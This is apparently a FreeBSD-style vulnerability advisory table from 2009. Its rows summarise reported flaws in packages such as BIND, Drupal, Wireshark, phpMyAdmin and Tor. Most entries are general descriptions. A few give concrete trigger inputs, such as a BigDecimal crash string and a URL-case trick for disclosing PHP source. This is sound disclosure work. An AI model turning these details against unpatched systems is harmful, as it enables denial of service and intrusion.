| 2009-08-04 | SILC changelog reports: An unspecified format string vulnerability exists in silc-client. more... | silc-client silc-irssi-client |
| 2009-08-04* | Problem Description: When named(8) receives a specially crafted dynamic update message an internal assertion check is triggered which causes named(8) to exit. To trigger the problem, the dynamic update message must contains a record of type "ANY" and at least one resource record set (RRset) for this fully qualified domain name (FQDN) must exist on the server. Impact: An attacker which can send DNS requests to a nameserver can cause it to exit, thus creating a Denial of Service situation. Workaround: No generally applicable workaround is available, but some firewalls may be able to prevent nsupdate DNS packets from reaching the nameserver. NOTE WELL: Merely configuring named(8) to ignore dynamic updates is NOT sufficient to protect it from this vulnerability. more... | bind9 bind9-sdb-ldap bind9-sdb-postgresql |
| 2009-08-02 | Problem Description: The SquirrelMail Web Server has been compromised, and three plugins are affected. The port of squirrelmail-sasql-plugin is safe (right MD5), and change_pass is not in the FreeBSD ports tree, but multilogin has a wrong MD5. more... | squirrelmail-multilogin-plugin |
| 2009-07-29 | Secunia reports: A security issue has been reported in Mono, which can be exploited by malicious people to conduct spoofing attacks. The security issue is caused due to an error when processing certain XML signatures. more... | mono |
| 2009-07-21* | US-CERT reports: The ISC DHCP dhclient application contains a stack buffer overflow, which may allow a remote, unauthenticated attacker to execute arbitrary code with root privileges. more... | isc-dhcp30-client isc-dhcp31-client |
| 2009-07-13* | The Drupal Security Team reports: Cross-site scripting The Forum module does not correctly handle certain arguments obtained from the URL. By enticing a suitably privileged user to visit a specially crafted URL, a malicious user is able to insert arbitrary HTML and script code into forum pages. Such a cross-site scripting attack may lead to the malicious user gaining administrative access. Wikipedia has more information about cross-site scripting (XSS). User signatures have no separate input format, they use the format of the comment with which they are displayed. A user will no longer be able to edit a comment when an administrator changes the comment's input format to a format that is not accessible to the user. However they will still be able to modify their signature, which will then be processed by the new input format. If the new format is very permissive, via their signature, the user may be able to insert arbitrary HTML and script code into pages or, when the PHP filter is enabled for the new format, execute PHP code. This issue affects Drupal 6.x only. When an anonymous user fails to login due to mistyping his username or password, and the page he is on contains a sortable table, the (incorrect) username and password are included in links on the table. If the user visits these links the password may then be leaked to external sites via the HTTP referer. In addition, if the anonymous user is enticed to visit the site via a specially crafted URL while the Drupal page cache is enabled, a malicious user might be able to retrieve the (incorrect) username and password from the page cache. more... | drupal5 drupal6 |
| 2009-07-13* | Secunia reports: A vulnerability has been reported in Nagios, which can be exploited by malicious users to potentially compromise a vulnerable system. Input passed to the "ping" parameter in statuswml.cgi is not properly sanitised before being used to invoke the ping command. This can be exploited to inject and execute arbitrary shell commands. Successful exploitation requires access to the ping feature of the WAP interface. more... | nagios nagios-devel nagios2 |
| 2009-07-03 | nfsen reports: Due to double input checking, a remote command execution security bug exists in all NfSen versions 1.3 and 1.3.1. Users are requested to update to nfsen-1.3.2. more... | nfsen |
| 2009-07-01* | Florian Grandel reports: I have not had the time to analyze all of syslog-ng code. But by reading the code section near the chroot call and looking at strace results I believe that syslog-ng does not chdir to the chroot jail's location before chrooting into it. This opens up ways to work around the chroot jail. more... | syslog-ng syslog-ng2 |
| 2009-06-30 | The phpMyAdmin project reports: It was possible to conduct an XSS attack via a crafted SQL bookmark. All 3.x releases on which the "bookmarks" feature is active are affected, previous versions are not. more... | phpMyAdmin |
| 2009-06-23 | The Tor Project reports: A malicious exit relay could convince a controller that the client's DNS question resolves to an internal IP address. more... | tor-devel |
| 2009-06-23* | Secunia reports: A vulnerability with an unknown impact has been reported in Tor. The vulnerability is caused due to an unspecified error and can be exploited to trigger a heap corruption. No further information is currently available. more... | tor tor-devel |
| 2009-06-16 | Secunia reports: Some vulnerabilities have been reported in Cscope, which potentially can be exploited by malicious people to compromise a user's system. The vulnerabilities are caused due to various boundary errors, which can be exploited to cause buffer overflows when parsing specially crafted files or directories. more... | cscope |
| 2009-06-16 | SecurityFocus reports: Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. more... | cscope |
| 2009-06-16 | Secunia reports: Some vulnerabilities have been reported in Joomla!, which can be exploited by malicious users to conduct script insertion attacks and by malicious people to conduct cross-site scripting attacks. Certain unspecified input is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which will be executed in a user's browser session in the context of an affected site when the malicious data is displayed. Certain unspecified input passed to the user view of the com_users core component is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Input passed via certain parameters to the "JA_Purity" template is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. more... | joomla15 |
| 2009-06-16 | Secunia reports: Some vulnerabilities and weaknesses have been reported in Pidgin, which can be exploited by malicious people to cause a DoS or to potentially compromise a user's system. A truncation error in the processing of MSN SLP messages can be exploited to cause a buffer overflow. A boundary error in the XMPP SOCKS5 "bytestream" server when initiating an outgoing file transfer can be exploited to cause a buffer overflow. A boundary error exists in the implementation of the "PurpleCircBuffer" structure. This can be exploited to corrupt memory and cause a crash via specially crafted XMPP or Sametime packets. A boundary error in the "decrypt_out()" function can be exploited to cause a stack-based buffer overflow with 8 bytes and crash the application via a specially crafted QQ packet. more... | finch libpurple pidgin |
| 2009-06-15 | SecurityFocus reports: Git is prone to a denial-of-service vulnerability because it fails to properly handle some client requests. Attackers can exploit this issue to cause a daemon process to enter an infinite loop. Repeated exploits may consume excessive system resources, resulting in a denial of service condition. more... | git |
| 2009-06-13* | The official ruby site reports: A denial of service (DoS) vulnerability was found on the BigDecimal standard library of Ruby. Conversion from BigDecimal objects into Float numbers had a problem which enables attackers to effectively cause segmentation faults. An attacker can cause a denial of service by causing BigDecimal to parse an insanely large number, such as: BigDecimal("9E69999999").to_s("F") more... | ruby ruby+oniguruma ruby+pthreads ruby+pthreads+oniguruma |
| 2009-06-08 | Secunia reports: Some vulnerabilities have been reported in APR-util, which can be exploited by malicious users and malicious people to cause a DoS (Denial of Service). A vulnerability is caused due to an error in the processing of XML files and can be exploited to exhaust all available memory via a specially crafted XML file containing a predefined entity inside an entity definition. A vulnerability is caused due to an error within the "apr_strmatch_precompile()" function in strmatch/apr_strmatch.c, which can be exploited to crash an application using the library. RedHat reports: A single NULL byte buffer overflow flaw was found in apr-util's apr_brigade_vprintf() function. more... | apache apr |
| 2009-06-04 | DokuWiki reports: A security hole was discovered which allows an attacker to include arbitrary files located on the attacked DokuWiki installation. The included file is executed in the PHP context. This can be escalated by introducing malicious code through uploading file via the media manager or placing PHP code in editable pages. more... | dokuwiki dokuwiki-devel |
| 2009-05-30 | Secunia reports: The vulnerability is caused due to an error in the processing of private messages within the server module (/mod/server.mod/servrmsg.c). This can be exploited to cause a crash by sending a specially crafted message to the bot. more... | eggdrop |
| 2009-05-30 | Secunia reports: A vulnerability has been reported in Wireshark, which can be exploited by malicious people to cause a DoS. The vulnerability is caused due to an error in the PCNFSD dissector and can be exploited to cause a crash via a specially crafted PCNFSD packet. more... | ethereal ethereal-lite tethereal tethereal-lite wireshark wireshark-lite |
| 2009-05-30 | Secunia reports: Two vulnerabilities have been reported in libsndfile, which can be exploited by malicious people to compromise an application using the library. A boundary error exists within the "voc_read_header()" function in src/voc.c. This can be exploited to cause a heap-based buffer overflow via a specially crafted VOC file. A boundary error exists within the "aiff_read_header()" function in src/aiff.c. This can be exploited to cause a heap-based buffer overflow via a specially crafted AIFF file. more... | libsndfile |
| 2009-05-30 | Secunia reports: A security issue has been reported in SLiM, which can be exploited by malicious, local users to disclose sensitive information. The security issue is caused due to the application generating the X authority file by passing the X authority cookie via the command line to "xauth". This can be exploited to disclose the X authority cookie by consulting the process list and e.g. gain access the user's display. more... | slim |
| 2009-05-22* | SecurityFocus reports: University of Washington IMAP c-client is prone to a remote format-string vulnerability because the software fails to adequately sanitize user-supplied input before passing it as the format-specifier to a formatted-printing function. more... | imap-uw |
| 2009-05-22* | NLnet Labs: A one-byte buffer overflow has been reported in NSD. The problem affects all versions 2.0.0 to 3.2.1. The bug allows a carefully crafted exploit to bring down your DNS server. It is highly unlikely that this one byte overflow can lead to other (system) exploits. more... | nsd nsd2 |
| 2009-05-20 | US-CERT reports: ntpd contains a stack buffer overflow which may allow a remote unauthenticated attacker to execute arbitrary code on a vulnerable system or create a denial of service. more... | ntp |
| 2009-05-17 | xine developers report: Fix another possible int overflow in the 4XM demuxer. (ref. TKADV2009-004, CVE-2009-0385) Fix an integer overflow in the Quicktime demuxer. more... | libxine |
| 2009-05-17 | Multiple vulnerabilities were fixed in libxine 1.1.16.2. Tobias Klein reports: FFmpeg contains a type conversion vulnerability while parsing malformed 4X movie files. The vulnerability may be exploited by a (remote) attacker to execute arbitrary code in the context of FFmpeg or an application using the FFmpeg library. Note: A similar issue also affects xine-lib < version 1.1.16.2. xine developers report: Fix broken size checks in various input plugins (ref. CVE-2008-5239). More malloc checking (ref. CVE-2008-5240). more... | libxine |
| 2009-05-16 | securityfocus research reports: A bug that leads to the emptying of the INI file contents if the database key was not found exists in PHP dba extension in versions 5.2.6, 4.4.9 and earlier. Function dba_replace() are not filtering strings key and value. There is a possibility for the destruction of the file. more... | php4-dba php5-dba |
| 2009-05-16 | Secunia reports: A vulnerability has been reported in libwmf, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise an application using the library. The vulnerability is caused due to a use-after-free error within the embedded GD library, which can be exploited to cause a crash or potentially to execute arbitrary code via a specially crafted WMF file. more... | libwmf |
| 2009-05-16 | Secunia reports: infamous41md has reported a vulnerability in libwmf, which potentially can be exploited by malicious people to compromise an application using the vulnerable library. The vulnerability is caused due to an integer overflow error when allocating memory based on a value taken directly from a WMF file without performing any checks. This can be exploited to cause a heap-based buffer overflow when a specially crafted WMF file is processed. more... | libwmf |
| 2009-05-16 | Secunia reports: Input passed via multiple parameters to action/AttachFile.py is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. more... | moinmoin |
| 2009-05-16* | Secunia reports: Certain input passed to the "Apache::Status" and "Apache2::Status" modules is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected website. more... | mod_perl mod_perl2 |
| 2009-05-16* | The Drupal Security Team reports: When outputting user-supplied data Drupal strips potentially dangerous HTML attributes and tags or escapes characters which have a special meaning in HTML. This output filtering secures the site against cross site scripting attacks via user input. Certain byte sequences that are valid in the UTF-8 specification are potentially dangerous when interpreted as UTF-7. Internet Explorer 6 and 7 may decode these characters as UTF-7 if they appear before the tag that specifies the page content as UTF-8, despite the fact that Drupal also sends a real HTTP header specifying the content as UTF-8. This enables attackers to execute cross site scripting attacks with UTF-7. SA-CORE-2009-005 - Drupal core - Cross site scripting contained an incomplete fix for the issue. HTML exports of books are still vulnerable, which means that anyone with edit permissions for pages in outlines is able to insert arbitrary HTML and script code in these exports. Additionally, the taxonomy module allows users with the 'administer taxonomy' permission to inject arbitrary HTML and script code in the help text of any vocabulary. more... | drupal5 drupal6 |
| 2009-05-15 | US-CERT reports: The sasl_encode64() function converts a string into base64. The Cyrus SASL library contains buffer overflows that occur because of unsafe use of the sasl_encode64() function. more... | cyrus-sasl |
| 2009-05-13 | Secunia reports: Some vulnerabilities have been reported in MoinMoin, which can be exploited by malicious people to conduct cross-site scripting attacks. Input passed to multiple parameters in action/AttachFile.py is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. Certain input passed to security/antispam.py is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. more... | moinmoin |
| 2009-05-13 | SecurityFocus reports: Ghostscript is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it into a finite-sized buffer. Exploiting this issue allows remote attackers to overwrite a sensitive memory buffer with arbitrary data, potentially allowing them to execute malicious machine code in the context of the affected application. This vulnerability may facilitate the compromise of affected computers. more... | ghostscript8 ghostscript8-nox11 |
| 2009-05-13* | Wireshark team reports: Wireshark 1.0.7 fixes the following vulnerabilities: The PROFINET dissector was vulnerable to a format string overflow. (Bug 3382) Versions affected: 0.99.6 to 1.0.6, CVE-2009-1210. The Check Point High-Availability Protocol (CPHAP) dissector could crash. (Bug 3269) Versions affected: 0.9.6 to 1.0.6; CVE-2009-1268. Wireshark could crash while loading a Tektronix .rf5 file. (Bug 3366) Versions affected: 0.99.6 to 1.0.6, CVE-2009-1269. more... | ethereal ethereal-lite tethereal tethereal-lite wireshark wireshark-lite |
| 2009-05-13* | Gentoo security team summarizes: The following issues were reported in CUPS: iDefense reported an integer overflow in the _cupsImageReadTIFF() function in the "imagetops" filter, leading to a heap-based buffer overflow (CVE-2009-0163). Aaron Siegel of Apple Product Security reported that the CUPS web interface does not verify the content of the "Host" HTTP header properly (CVE-2009-0164). Braden Thomas and Drew Yao of Apple Product Security reported that CUPS is vulnerable to CVE-2009-0146, CVE-2009-0147 and CVE-2009-0166, found earlier in xpdf and poppler. A remote attacker might send or entice a user to send a specially crafted print job to CUPS, possibly resulting in the execution of arbitrary code with the privileges of the configured CUPS user -- by default this is "lp", or a Denial of Service. Furthermore, the web interface could be used to conduct DNS rebinding attacks. more... | cups-base |
| 2009-05-13* | Secunia reports: A vulnerability has been reported in Openfire which can be exploited by malicious users to bypass certain security restrictions. The vulnerability is caused due to Openfire not properly respecting the no password changes setting which can be exploited to change passwords by sending jabber:iq:auth passwd_change requests to the server. more... | openfire |
| 2009-05-07* | Debian Security Team reports: It was discovered that Quagga, an IP routing daemon, could no longer process the Internet routing table due to broken handling of multiple 4-byte AS numbers in an AS path. If such a prefix is received, the BGP daemon crashes with an assert failure leading to a denial of service. more... | quagga |
| 2009-04-30 | Drupal Security Team reports: When outputting user-supplied data Drupal strips potentially dangerous HTML attributes and tags or escapes characters which have a special meaning in HTML. This output filtering secures the site against cross site scripting attacks via user input. Certain byte sequences that are valid in the UTF-8 specification are potentially dangerous when interpreted as UTF-7. Internet Explorer 6 and 7 may decode these characters as UTF-7 if they appear before the meta http-equiv="Content-Type" tag that specifies the page content as UTF-8, despite the fact that Drupal also sends a real HTTP header specifying the content as UTF-8. This behaviour enables malicious users to insert and execute Javascript in the context of the website if site visitors are allowed to post content. In addition, Drupal core also has a very limited information disclosure vulnerability under very specific conditions. If a user is tricked into visiting the site via a specially crafted URL and then submits a form (such as the search box) from that page, the information in their form submission may be directed to a third-party site determined by the URL and thus disclosed to the third party. The third party site may then execute a CSRF attack against the submitted form. more... | drupal5 drupal6 |
| 2009-04-29* | The KDE Team reports: kpdf, the KDE pdf viewer, shares code with xpdf. xpdf contains a vulnerability that can cause a stack based buffer overflow via a PDF file that exploits an integer overflow in StreamPredictor::StreamPredictor(). Remotely supplied pdf files can be used to disrupt the kpdf viewer on the client machine and possibly execute arbitrary code. more... | cups-base gpdf kdegraphics pdftohtml poppler xpdf |
| 2009-04-18 | Secunia reports: Some vulnerabilities have been reported in Poppler which can be exploited by malicious people to potentially compromise an application using the library. more... | poppler |
| 2009-04-18* | Secunia reports: Some vulnerabilities have been reported in Xpdf, which can be exploited by malicious people to potentially compromise a user's system. A boundary error exists when decoding JBIG2 symbol dictionary segments. This can be exploited to cause a heap-based buffer overflow and potentially execute arbitrary code. Multiple integer overflows in the JBIG2 decoder can be exploited to potentially execute arbitrary code. Multiple boundary errors in the JBIG2 decoder can be exploited to cause buffer overflows and potentially execute arbitrary code. Multiple errors in the JBIG2 decoder can be exploited can be exploited to free arbitrary memory and potentially execute arbitrary code. Multiple unspecified input validation errors in the JBIG2 decoder can be exploited to potentially execute arbitrary code. more... | xpdf |
| 2009-04-18 | Secunia reports: Some vulnerabilities have been reported in FreeType, which can be exploited by malicious people to potentially compromise an application using the library. An integer overflow error within the "cff_charset_compute_cids()" function in cff/cffload.c can be exploited to potentially cause a heap-based buffer overflow via a specially crafted font. Multiple integer overflow errors within validation functions in sfnt/ttcmap.c can be exploited to bypass length validations and potentially cause buffer overflows via specially crafted fonts. An integer overflow error within the "ft_smooth_render_generic()" function in smooth/ftsmooth.c can be exploited to potentially cause a heap-based buffer overflow via a specially crafted font. more... | freetype2 |
| 2009-04-17 | SecurityFocus reports: The ejabberd application is prone to a cross-site scripting vulnerability. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials. more... | ejabberd |
| 2009-04-15 | Ziproxy Developers reports: Multiple HTTP proxy implementations are prone to an information-disclosure vulnerability related to the interpretation of the 'Host' HTTP header. Specifically, this issue occurs when the proxy makes a forwarding decision based on the 'Host' HTTP header instead of the destination IP address. Attackers may exploit this issue to obtain sensitive information such as internal intranet webpages. Additional attacks may also be possible. more... | ziproxy |
| 2009-04-15 | phpMyAdmin Team reports: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. This issue is on different parameters than PMASA-2009-3 and it was missed out of our radar because it was not existing in 2.11.x branch. more... | phpMyAdmin |
| 2009-04-11 | Drupal CCK plugin developer reports: The Node reference and User reference sub-modules, which are part of the Content Construction Kit (CCK) project, lets administrators define node fields that are references to other nodes or to users. When displaying a node edit form, the titles of candidate referenced nodes or names of candidate referenced users are not properly filtered, allowing malicious users to inject arbitrary code on those pages. Such a cross site scripting (XSS) attack may lead to a malicious user gaining full administrative access. more... | drupal6-cck |
| 2009-03-27 | Secunia reports: A vulnerability has been discovered in Pivot, which can be exploited by malicious people to delete certain files. Input passed to the "refkey" parameter in extensions/bbclone_tools/count.php is not properly sanitised before being used to delete files. This can be exploited to delete files with the permissions of the web server via directory traversal sequences passed within the "refkey" parameter. NOTE: Users with the "Advanced" user level are able to include and execute uploaded PHP code via the "pivot_path" parameter in extensions/bbclone_tools/getkey.php when extensions/bbclone_tools/hr_conf.php can be deleted. more... | pivot-weblog |
| 2009-03-26* | Secunia reports: Some vulnerabilities have been reported in RoundCube Webmail, which can be exploited by malicious users to compromise a vulnerable system and by malicious people to conduct script insertion attacks and compromise a vulnerable system. The HTML "background" attribute within e.g. HTML emails is not properly sanitised before being used. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site if a malicious email is viewed. Input passed via a vCard is not properly sanitised before being used in a call to "preg_replace()" with the "e" modifier in program/include/rcube_vcard.php. This can be exploited to inject and execute arbitrary PHP code by e.g. tricking a user into importing a malicious vCard file. more... | roundcube |
| 2009-03-25 | phpMyAdmin reports: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. more... | phpMyAdmin phpMyAdmin211 |
| 2009-03-23 | Secunia reports: Tobias Klein has reported some vulnerabilities in Amarok, which potentially can be exploited by malicious people to compromise a user's system. Two integer overflow errors exist within the "Audible::Tag::readTag()" function in src/metadata/audible/audibletag.cpp. These can be exploited to cause heap-based buffer overflows via specially crafted Audible Audio files. Two errors within the "Audible::Tag::readTag()" function in src/metadata/audible/audibletag.cpp can be exploited to corrupt arbitrary memory via specially crafted Audible Audio files. more... | amarok |
| 2009-03-23* | Vendor reports: On non-Windows systems Wireshark could crash if the HOME environment variable contained sprintf-style string formatting characters. Wireshark could crash while reading a malformed NetScreen snoop file. Wireshark could crash while reading a Tektronix K12 text capture file. more... | ethereal ethereal-lite tethereal tethereal-lite wireshark wireshark-lite |
| 2009-03-23* | Secunia reports: Some vulnerabilities have been reported in the ZABBIX PHP frontend, which can be exploited by malicious people to conduct cross-site request forgery attacks and malicious users to disclose sensitive information and compromise a vulnerable system. Input appended to and passed via the "extlang" parameter to the "calc_exp2()" function in include/validate.inc.php is not properly sanitised before being used. This can be exploited to inject and execute arbitrary PHP code. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to e.g. create users by enticing a logged in administrator to visit a malicious web page. Input passed to the "srclang" parameter in locales.php (when "next" is set to a non-NULL value) is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources via directory traversal attacks and URL-encoded NULL bytes. more... | zabbix zabbix-agent |
| 2009-03-23* | Wes Hardaker reports through sourceforge.net forum: SECURITY ISSUE: A bug in the getbulk handling code could let anyone with even minimal access crash the agent. If you have open access to your snmp agents (bad bad bad; stop doing that!) or if you don't trust everyone that does have access to your agents you should updated immediately to prevent potential denial of service attacks. Description at cve.mitre.org additionally clarifies: Integer overflow in the netsnmp_create_subtree_cache function in agent/snmp_agent.c in net-snmp 5.4 before 5.4.2.1, 5.3 before 5.3.2.3, and 5.2 before 5.2.5.1 allows remote attackers to cause a denial of service (crash) via a crafted SNMP GETBULK request, which triggers a heap-based buffer overflow, related to the number of responses or repeats. more... | net-snmp |
| 2009-03-23* | Jonathan Weiss reports, that it is possible to perform an SQL injection in Rails applications via not correctly sanitized :limit and :offset parameters. It is possible to change arbitrary values in affected tables or gain access to the sensitive data. more... | rubygem-rails |
| 2009-03-22* | The Zope Team reports: A vulnerability has been discovered in Zope, where by certain types of misuse of HTTP GET, an attacker could gain elevated privileges. All Zope versions up to and including 2.10.2 are affected. more... | plone zope |
| 2009-03-20* | Secunia reports: Some vulnerabilities have been reported in Tor, where one has an unknown impact and others can be exploited by malicious people to cause a DoS. An error when running Tor as a directory authority can be exploited to trigger the execution of an infinite loop. An unspecified error exists when running on Windows systems prior to Windows XP. No further information is currently available. more... | tor tor-devel |
| 2009-03-18* | Secunia reports: A vulnerability has been reported in Netatalk, which potentially can be exploited by malicious users to compromise a vulnerable system. The vulnerability is caused due to the papd daemon improperly sanitising several received parameters before passing them in a call to popen(). This can be exploited to execute arbitrary commands via a specially crafted printing request. Successful exploitation requires that a printer is configured to pass arbitrary values as parameters to a piped command. more... | netatalk |
| 2009-03-16 | Secunia reports: Tobias Klein has reported some vulnerabilities in GStreamer Good Plug-ins, which can potentially be exploited by malicious people to compromise a vulnerable system. A boundary error occurs within the "qtdemux_parse_samples()" function in gst/gtdemux/qtdemux.c when performing QuickTime "ctts" Atom parsing. This can be exploited to cause a heap-based buffer overflow via a specially crafted QuickTime media file. An array indexing error exists in the "qtdemux_parse_samples()" function in gst/gtdemux/qtdemux.c when performing QuickTime "stss" Atom parsing. This can be exploited to corrupt memory via a specially crafted QuickTime media file. A boundary error occurs within the "qtdemux_parse_samples()" function in gst/gtdemux/qtdemux.c when performing QuickTime "stts" Atom parsing. This can be exploited to cause a heap-based buffer overflow via a specially crafted QuickTime media file. more... | gstreamer-plugins-good |
| 2009-03-16 | Secunia reports: The vulnerability is caused due to an integer overflow error in the processing of CAF description chunks. This can be exploited to cause a heap-based buffer overflow by tricking the user into processing a specially crafted CAF audio file. more... | libsndfile |
| 2009-03-16 | Secunia reports: Tobias Klein has reported a vulnerability in FFmpeg, which potentially can be exploited by malicious people to compromise an application using the library. The vulnerability is caused due to a signedness error within the "fourxm_read_header()" function in libavformat/4xm.c. This can be exploited to corrupt arbitrary memory via a specially crafted 4xm file. more... | ffmpeg |
| 2009-03-16 | Secunia reports: Some vulnerabilities have been reported in ProFTPD, which can be exploited by malicious people to conduct SQL injection attacks. The application improperly sets the character encoding prior to performing SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code in an environment using a multi-byte character encoding. An error exists in the "mod_sql" module when processing e.g. user names containing '%' characters. This can be exploited to bypass input sanitation routines and manipulate SQL queries by injecting arbitrary SQL code. more... | proftpd proftpd-devel proftpd-mysql |
| 2009-03-16 | SecurityFocus reports: PHP is prone to a buffer-overflow vulnerability because it fails to perform boundary checks before copying user-supplied data to insufficiently sized memory buffers. The issue affects the 'mbstring' extension included in the standard distribution. An attacker can exploit this issue to execute arbitrary machine code in the context of the affected webserver. Failed exploit attempts will likely crash the webserver, denying service to legitimate users. more... | php4-mbstring php5-mbstring |
| 2009-03-16 | Secunia reports: Dun has discovered a vulnerability in phpPgAdmin, which can be exploited by malicious people to disclose sensitive information. Input passed via the "_language" parameter to libraries/lib.inc.php is not properly sanitised before being used to include files. This can be exploited to include arbitrary files from local resources via directory traversal attacks and URL-encoded NULL bytes. more... | phppgadmin |
| 2009-03-15 | Opera Team reports: An unspecified error in the processing of JPEG images can be exploited to trigger a memory corruption. An error can be exploited to execute arbitrary script code in a different domain via unspecified plugins. An unspecified error has a "moderately severe" impact. No further information is available. more... | linux-opera opera |
| 2009-03-11 | CVE Mitre reports: Untrusted search path vulnerability in the Python interface in Epiphany 2.22.3, and possibly other versions, allows local users to execute arbitrary code via a Trojan horse Python file in the current working directory, related to a vulnerability in the PySys_SetArgv function (CVE-2008-5983). more... | epiphany |
| 2009-03-11 | CVE Mitre reports: Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI. more... | apache |
| 2009-03-04 | Secunia reports: A vulnerability has been reported in Pngcrush, which can be exploited by malicious people to potentially compromise a user's system. The vulnerability is caused due to the use of vulnerable libpng code. more... | pngcrush |
| 2009-03-04 | Secunia reports: The security issue is caused due to cURL following HTTP Location: redirects to e.g. scp:// or file:// URLs which can be exploited by a malicious HTTP server to overwrite or disclose the content of arbitrary local files and potentially execute arbitrary commands via specially crafted redirect URLs. more... | curl |
| 2009-02-22* | Lighttpd seurity annoucement: lighttpd 1.4.19, and possibly other versions before 1.5.0, does not decode the url before matching against rewrite and redirect patterns, which allows attackers to bypass rewrites rules. this can be a security problem in certain configurations if these rules are used to hide certain urls. lighttpd 1.4.19, and possibly other versions before 1.5.0, does not lowercase the filename after generating it from the url in mod_userdir on case insensitive (file)systems. As other modules are case sensitive, this may lead to information disclosure; for example if one configured php to handle files ending on ".php", an attacker will get the php source with http://example.com/~user/file.PHP lighttpd 1.4.19 does not always release a header if it triggered a 400 (Bad Request) due to a duplicate header. more... | lighttpd |
| 2009-02-18 | Matthew Weier O'Phinney reports: A potential Local File Inclusion (LFI) vulnerability exists in the Zend_View::render() method. If user input is used to specify the script path, then it is possible to trigger the LFI. Note that Zend Framework applications that never call the Zend_View::render() method with a user-supplied parameter are not affected by this vulnerability. more... | ZendFramework |
| 2009-02-17 | Security Focus reports: An attacker could exploit this issue by enticing an unsuspecting victim to execute the vulnerable application in a directory containing a malicious Python file. A successful exploit will allow arbitrary Python commands to run within the privileges of the currently logged-in user. more... | dia |
| 2009-02-15 | Dwayne C. Litzenberger reports: pycrypto is exposed to a buffer overflow issue because it fails to adequately verify user-supplied input. This issue resides in the ARC2 module. This issue can be triggered with specially crafted ARC2 keys in excess of 128 bytes. more... | py-pycrypto |
| 2009-02-15* | SecurityFocus reports: Varnish is prone to a remote denial-of-service vulnerability because the application fails to handle certain HTTP requests. Successfully exploiting this issue allows remote attackers to crash the affected application denying further service to legitimate users. more... | varnish |
| 2009-02-11 | znirkel reports: The eval() function in _reset_post_array crashes when posting certain data. By passing in carefully-crafted input data, the eval() function could also execute malicious PHP code. Note that CodeIgniter applications that either do not use the new Form Validation class or use the old Validation class are not affected by this vulnerability. more... | codeigniter |
| 2009-02-11 | Security Focus reports: PyBlosxom is prone to multiple XML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied XML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. more... | pyblosxom |
| 2009-02-11 | Secunia reports: Some vulnerabilities have been reported in Typo3, which can be exploited by malicious people to conduct cross-site scripting attacks and disclose sensitive information. Input passed via unspecified fields to the backend user interface is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. An error in the "jumpUrl" mechanism can be exploited to read arbitrary files from local resources by disclosing a hash secret used to restrict file access. more... | typo3 |
| 2009-02-10* | Squid security advisory 2009:1 reports: Due to an internal error Squid is vulnerable to a denial of service attack when processing specially crafted requests. This problem allows any client to perform a denial of service attack on the Squid service. more... | squid |
| 2009-02-09 | Secunia reports: A boundary error when processing "div" HTML tags can be exploited to cause a stack-based buffer overflow via an overly long "id" parameter. A boundary error exists when processing overly long links. This can be exploited to cause a stack-based buffer overflow by tricking the user into e.g. editing a malicious link. A boundary error when processing e.g. a "bdo" HTML tag having an overly long "dir" attribute can be exploited to cause a stack-based buffer overflow. A boundary error when processing "input" HTML tags can be exploited to cause a stack-based buffer overflow via an overly long e.g. "type" attribute. more... | amaya |
| 2009-02-09 | Secunia reports: Some vulnerabilities have been reported in WebSVN, which can be exploited by malicious users to disclose sensitive information, and by malicious people to conduct cross-site scripting attacks and manipulate data. Input passed in the URL to index.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Input passed to the "rev" parameter in rss.php is not properly sanitised before being used. This can be exploited to overwrite arbitrary files via directory traversal attacks. Access to restricted repositories is not properly enforced, which can be exploited to disclose potentially sensitive information by accessing the repository via "listing.php" and using the "compare with previous" and "show changed files" links. more... | websvn |
| 2009-02-09 | Secunia reports: Input passed to the "_SERVER[ConfigFile]" parameter in admin/index.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources. more... | phplist |
